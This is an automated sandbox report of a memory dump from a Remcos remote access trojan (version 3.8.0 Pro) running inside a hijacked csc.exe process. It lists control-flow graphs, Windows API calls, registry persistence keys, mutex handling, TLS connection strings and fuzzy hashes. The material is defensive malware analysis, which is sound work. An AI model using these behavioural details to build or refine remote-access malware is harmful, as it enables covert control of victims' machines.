                                      • Opcode Fuzzy Hash: 6478cae6bbf69b57607277aa92944695820edf464b885749181eae48eaee1890
                                      • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                      • Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
                                      • Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                      • Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 91 40d991-40d99a call 401fb8 80->91 92 40d67f-40d686 80->92 101 40d622-40d63f call 401f8b call 411f34 81->101 102 40d60f-40d61c WaitForSingleObject CloseHandle 81->102 109 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 91->109 96 40d688 92->96 97 40d68a-40d6a7 GetModuleFileNameW call 4192ae 92->97 96->97 107 40d6b0-40d6b4 97->107 108 40d6a9-40d6ab 97->108 122 40d651 101->122 123 40d641-40d650 call 401f8b call 41239a 101->123 102->101 137 40dd2c 105->137 113 40d6b6-40d6c9 call 401e45 call 401f8b 107->113 114 40d717-40d72a call 401e45 call 401f8b 107->114 108->107 175 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 109->175 113->114 142 40d6cb-40d6d1 113->142 138 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 114->138 139 40d72c call 40e501 114->139 122->80 123->122 143 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 137->143 217 40d815-40d819 138->217 218 40d7af-40d7c8 call 401e45 call 401f8b call 439891 138->218 139->138 142->114 148 40d6d3-40d6d9 142->148 188 40dd6a-40dd6f call 413980 143->188 153 40d6f7-40d710 call 401f8b call 411eea 148->153 154 40d6db-40d6ee call 4060ea 148->154 153->114 179 40d712 call 4066a6 153->179 154->114 166 40d6f0-40d6f5 call 4067a0 154->166 166->114 220 40da61-40da63 175->220 221 40da65-40da67 175->221 179->114 217->109 219 40d81f-40d826 217->219 218->217 247 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 218->247 223 40d8a7-40d8b1 call 408093 219->223 224 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 219->224 225 40da6b-40da7c call 41aa4f CreateThread 220->225 226 40da69 221->226 227 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 221->227 236 40d8b6-40d8de call 40245c call 43254d 223->236 224->236 225->227 226->225 349 40db83-40db9a call 401e45 call 401f8b 227->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 227->350 255 40d8f0 236->255 256 40d8e0-40d8ee call 434c30 236->256 247->217 262 40d8f2-40d93d call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 255->262 256->262 316 40d942-40d967 call 432556 call 401e45 call 40fbab 262->316 316->175 332 40d96d-40d98c call 401e45 call 419bca call 40de34 316->332 332->175 345 40d98e-40d990 332->345 345->91 360 40dbd9-40dbeb call 401e45 call 401f8b 349->360 361 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->361 350->349 372 40dc4c-40dc5e call 401e45 call 401f8b 360->372 373 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 360->373 361->360 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 372->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 372->384 373->372 383->384 406 40dcc1-40dcc2 SetProcessDEPPolicy 384->406 407 40dcc4-40dcd7 CreateThread 384->407 406->407 408 40dce5-40dcec 407->408 409 40dcd9-40dce3 CreateThread 407->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->137 416 40dd03-40dd06 412->416 413->412 416->188 418 40dd08-40dd0d 416->418 418->143
                                      APIs
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                        • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                        • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                        • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                        • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                      • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                      • API String ID: 1529173511-4213420950
                                      • Opcode ID: bdd63cd4f36787aa8727e4578ad72d12b961ebbb6f147ec25dee57e116d87ff1
                                      • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                      • Opcode Fuzzy Hash: bdd63cd4f36787aa8727e4578ad72d12b961ebbb6f147ec25dee57e116d87ff1
                                      • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 420 413980-4139c8 call 4020bf call 419894 call 4020bf call 401e45 call 401f8b call 439867 433 4139d7-413a23 call 402073 call 401e45 call 4020d6 call 419d87 call 40487e call 401e45 call 40fbab 420->433 434 4139ca-4139d1 Sleep 420->434 449 413a25-413a94 call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 401e45 call 40245c call 401e45 call 401f8b call 40471d 433->449 450 413a97-413b32 call 402073 call 401e45 call 4020d6 call 419d87 call 401e45 * 2 call 40822a call 402ef0 call 401fc2 call 401fb8 * 2 call 401e45 call 405ae5 433->450 434->433 449->450 503 413b42-413b49 450->503 504 413b34-413b40 450->504 505 413b4e-413be0 call 405a86 call 4052fe call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 2 call 401e45 call 401f8b call 401e45 call 401f8b call 41393f 503->505 504->505 532 413be2-413c26 WSAGetLastError call 41a86b call 4052dd call 402073 call 4194da call 401fb8 505->532 533 413c2b-413c39 call 40480d 505->533 555 414493-4144a5 call 404e06 call 4021da 532->555 538 413c66-413c74 call 404f31 call 4048a8 533->538 539 413c3b-413c61 call 402073 * 2 call 4194da 533->539 551 413c79-413c7b 538->551 539->555 554 413c81-413dd4 call 401e45 * 2 call 4052fe call 408209 call 402ef0 call 408209 call 402ef0 call 402073 call 4194da call 401fb8 * 4 call 4197c1 call 413013 call 408098 call 43f34f call 401e45 call 4020d6 call 40245c call 401f8b * 2 call 4120e8 551->554 551->555 620 413dd6-413de3 call 405a86 554->620 621 413de8-413e0f call 401f8b call 411f91 554->621 569 4144a7-4144c7 call 401e45 call 401f8b call 439867 Sleep 555->569 570 4144cd-4144d5 call 401e6d 555->570 569->570 570->450 620->621 627 413e11-413e13 621->627 628 413e16-414406 call 40415e call 419c8a call 419b16 call 401e45 GetTickCount call 419b16 call 419ac6 call 419b16 call 419a77 call 419c8a * 5 call 40e2bb call 419c8a call 402f11 call 402e81 call 402ef0 call 402e81 call 402ef0 * 3 call 402e81 call 402ef0 call 408209 call 402ef0 call 408209 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 40826c call 402ef0 call 402e81 call 402ef0 call 402e81 call 402ef0 call 408209 call 402ef0 * 5 call 402e81 call 402ef0 call 402e81 call 402ef0 * 6 call 404a81 call 401fb8 * 48 call 401ee9 call 401fb8 * 4 call 401ee9 call 404bf0 621->628 627->628 856 414408-41440f 628->856 857 41441a-414421 628->857 856->857 858 414411-414413 856->858 859 414423-414428 call 409f9a 857->859 860 41442d-41445f call 405a4b call 402073 * 2 call 4194da 857->860 858->857 859->860 871 414461-41446d CreateThread 860->871 872 414473-41448e call 401fb8 * 2 call 401ee9 860->872 871->872 872->555
                                      APIs
                                      • Sleep.KERNEL32(00000000,00000029,76F90F10,00471FFC,00000000), ref: 004139D1
                                      • WSAGetLastError.WS2_32(00000000,00000001), ref: 00413BE2
                                      • Sleep.KERNELBASE(00000000,00000002), ref: 004144C7
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$ErrorLastLocalTime
                                      • String ID: | $%I64u$3.8.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$H"G$TLS Off$TLS On $`"G$hlight$name$!G
                                      • API String ID: 524882891-1975308376
                                      • Opcode ID: a4627c6522532ff0679ad81dcd823020aed78b04a5345c0ea806dfd5ddea459c
                                      • Instruction ID: 5f58eceae2704c6c0e376aa481a0c6a7ef3cc820e2c63ea8d389b44db61c6c97
                                      • Opcode Fuzzy Hash: a4627c6522532ff0679ad81dcd823020aed78b04a5345c0ea806dfd5ddea459c
                                      • Instruction Fuzzy Hash: 9F42AE31A001055BCB18F765DDA6AEEB3699F90308F1041BFF40A721E2EF785F868A5D

                                      Control-flow Graph

                                      APIs
                                      • connect.WS2_32(?,?,?), ref: 004048C0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049E0
                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 004049EE
                                      • WSAGetLastError.WS2_32 ref: 00404A01
                                        • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                      • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                      • API String ID: 994465650-2151626615
                                      • Opcode ID: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                      • Instruction ID: f1749a2af40dec866484330b2464a30bcc7489b9f615ba144f2b3c776ade1d80
                                      • Opcode Fuzzy Hash: c47823f5d81b8fcd8c44ffe76240809f8c8049aa42c9dfd8a5859606e97f7b5b
                                      • Instruction Fuzzy Hash: 37412AB5B406017BD608777A8E1B96E7625AB81304B50017FF901136D2EBBD9C2197DF

                                      Control-flow Graph

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                                      • closesocket.WS2_32(000000FF), ref: 00404E3A
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E71
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404E82
                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E89
                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9A
                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404E9F
                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EA4
                                      • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB1
                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404EB6
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEvent$ObjectSingleWait$ChangeFindHandleNotification$closesocket
                                      • String ID:
                                      • API String ID: 4074944092-0
                                      • Opcode ID: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                      • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                                      • Opcode Fuzzy Hash: f707382b18fa39c0527187131c55234197c0fa46854763e90b09e39a9568e99a
                                      • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                                      Control-flow Graph

                                      APIs
                                      • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                      • API String ID: 82841172-425784914
                                      • Opcode ID: fdf55ef1919d5190804472326a519426d46dfc921dffde84896619693265b41f
                                      • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                      • Opcode Fuzzy Hash: fdf55ef1919d5190804472326a519426d46dfc921dffde84896619693265b41f
                                      • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1100 4192ae-419305 call 419f23 call 411f91 call 401fc2 call 401fb8 call 4060ea 1111 419307-419316 call 411f91 1100->1111 1112 419348-419351 1100->1112 1117 41931b-419332 call 401f8b StrToIntA 1111->1117 1113 419353-419358 1112->1113 1114 41935a 1112->1114 1116 41935f-41936a call 40535d 1113->1116 1114->1116 1122 419340-419343 call 401fb8 1117->1122 1123 419334-41933d call 41accf 1117->1123 1122->1112 1123->1122
                                      APIs
                                        • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                        • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                        • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                        • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                      • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue
                                      • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 1866151309-2070987746
                                      • Opcode ID: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                      • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                      • Opcode Fuzzy Hash: 0802035b950ed000d9a10129efeec30dbf5645d1e0bd6e921da0c017b2021ac7
                                      • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1144 41215f-412176 RegCreateKeyA 1145 412178-4121ad call 40245c call 401f8b RegSetValueExA RegCloseKey 1144->1145 1146 4121af 1144->1146 1148 4121b1-4121bf call 401fb8 1145->1148 1146->1148
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041216E
                                      • RegSetValueExA.KERNELBASE(?,00464150,00000000,?,00000000,00000000,00472200,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 00412196
                                      • RegCloseKey.KERNELBASE(?,?,pth_unenc,0040E23B,00464150,3.8.0 Pro), ref: 004121A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: pth_unenc
                                      • API String ID: 1818849710-4028850238
                                      • Opcode ID: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                      • Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
                                      • Opcode Fuzzy Hash: bb05d805405002c9ea24476e63677667bc427e1baa708286b474a2e763bb1422
                                      • Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1154 411f34-411f5c RegOpenKeyExA 1155 411f8b 1154->1155 1156 411f5e-411f89 RegQueryValueExA RegCloseKey 1154->1156 1157 411f8d-411f90 1155->1157 1156->1157
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                      • RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: pth_unenc
                                      • API String ID: 3677997916-4028850238
                                      • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                      • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                      • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                      • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1158 411f91-411fbd RegOpenKeyExA 1159 411ff2 1158->1159 1160 411fbf-411fe7 RegQueryValueExA RegCloseKey 1158->1160 1161 411ff4 1159->1161 1160->1161 1162 411fe9-411ff0 1160->1162 1163 411ff9-412005 call 402073 1161->1163 1162->1163
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                      • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 3677997916-0
                                      • Opcode ID: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                      • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                      • Opcode Fuzzy Hash: bd819641beb65f800504f4ea07b1b85b9b2ddc2993f1f77fdff934dbeb1127c7
                                      • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1173 443649-443655 1174 443687-443692 call 43ad91 1173->1174 1175 443657-443659 1173->1175 1182 443694-443696 1174->1182 1176 443672-443683 RtlAllocateHeap 1175->1176 1177 44365b-44365c 1175->1177 1180 443685 1176->1180 1181 44365e-443665 call 442a57 1176->1181 1177->1176 1180->1182 1181->1174 1185 443667-443670 call 440480 1181->1185 1185->1174 1185->1176
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID: P@
                                      • API String ID: 1279760036-676759640
                                      • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                      • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                      • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                      • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1188 443697-4436a2 1189 4436a4-4436a7 call 443649 1188->1189 1190 4436af-4436b5 1188->1190 1194 4436ac-4436ad 1189->1194 1192 4436b7-4436be call 443c92 1190->1192 1193 4436c0-4436c3 1190->1193 1204 4436d0 1192->1204 1196 4436c5-4436ca call 43ad91 1193->1196 1197 4436ea-4436fc RtlReAllocateHeap 1193->1197 1198 4436d3-4436d5 1194->1198 1196->1204 1199 4436d6-4436dd call 442a57 1197->1199 1200 4436fe 1197->1200 1199->1196 1208 4436df-4436e8 call 440480 1199->1208 1203 4436d2 1200->1203 1203->1198 1204->1203 1208->1196 1208->1197
                                      APIs
                                      • _free.LIBCMT ref: 004436B8
                                        • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                      • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00430CB7,00000000,0000000F,0042D6C1,?,?,0042F768,?,?,00000000), ref: 004436F4
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap$_free
                                      • String ID:
                                      • API String ID: 1482568997-0
                                      • Opcode ID: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
                                      • Instruction ID: 1ca59af56198d509cf9e402e21e9c8c5a276ccba14ddaf673a50935c82dc1d11
                                      • Opcode Fuzzy Hash: 7a24a503362ce6b0d8a8277bf03f94e4b882e5a9fcc2e03a2aeb4a458e56015f
